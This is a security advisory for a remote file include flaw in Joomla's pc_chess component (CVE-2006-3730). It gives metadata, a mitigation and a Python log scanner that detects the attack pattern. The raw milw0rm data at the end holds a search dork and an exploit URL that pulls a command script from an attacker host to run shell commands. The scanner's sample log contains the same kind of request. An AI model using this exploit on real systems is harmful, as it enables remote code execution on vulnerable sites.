Vendor: Joomla
By: milw0rm
CVSS: 7.5 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: Joomla
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CVE: CVE-2006-3730
CPE: o:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2006

pc_chess Component

The vulnerability exists because the 'mosConfig_absolute_path' parameter in the 'include.pcchess.php' script is not properly sanitized before it is used to include a file. An attacker can exploit this to include arbitrary local or remote files, which in turn allows execution of arbitrary PHP code.

Mitigation:

Upgrade to the latest version of the component.
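
A log check for the request pattern described above, as an added example that is not part of the original advisory or of the Joomla project: it flags every request that supplies 'mosConfig_absolute_path' in the query string and grades the value. The log lines, addresses, host names and the combined log format are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "mosConfig_absolute_path"  # parameter named in the advisory
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)  # any URL scheme

# Constructed log lines (assumed combined log format), not from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Jul/2006:10:00:01 +0000] '
    '"GET /index.php?option=com_pcchess HTTP/1.1" 200 5120',
    '192.0.2.44 - - [24/Jul/2006:10:02:13 +0000] '
    '"GET /components/com_pcchess/include.pcchess.php'
    '?mosConfig_absolute_path=http://files.example.test/cmd.txt?&cmd=ls HTTP/1.1" 200 312',
    '192.0.2.44 - - [24/Jul/2006:10:02:40 +0000] '
    '"GET /components/com_pcchess/include.pcchess.php'
    '?mosConfig_absolute_path=..%252F..%252Ftmp%252Fupload.txt HTTP/1.1" 200 98',
    '192.0.2.51 - - [24/Jul/2006:10:05:02 +0000] '
    '"GET /components/com_pcchess/include.pcchess.php'
    '?mosConfig_absolute_path=/var/www/site HTTP/1.0" 403 0',
]

def classify(line):
    """Return None, 'remote', 'traversal' or 'override' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != PARAM:
            continue
        value = unquote(value)  # second decode catches double-encoded values
        if SCHEME_RE.match(value):
            return "remote"      # include target is a URL
        if "../" in value or "..\\" in value:
            return "traversal"   # include target walks out of the web root
        return "override"        # a client should never set this at all
    return None

def scan(lines):
    """Return (client, verdict) for every line that supplies the parameter."""
    verdicts = ((line.split(" ", 1)[0], classify(line)) for line in lines)
    return [hit for hit in verdicts if hit[1]]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Any verdict is worth reviewing, since the parameter is a server-side configuration value and has no reason to appear in a client request.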

Exploit-DB raw data:

# pc_chess Component

- dork : index.php?option=com_pcchess

- exploit :

http://[target]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls 

# milw0rm.com [2006-07-24]